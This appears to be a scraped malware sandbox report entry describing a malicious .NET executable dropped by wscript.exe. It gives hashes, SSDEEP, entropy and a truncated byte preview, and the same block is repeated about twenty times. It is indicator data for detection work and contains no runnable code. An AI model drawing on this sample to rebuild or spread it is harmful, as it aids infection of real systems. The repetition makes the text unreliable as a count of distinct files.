                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
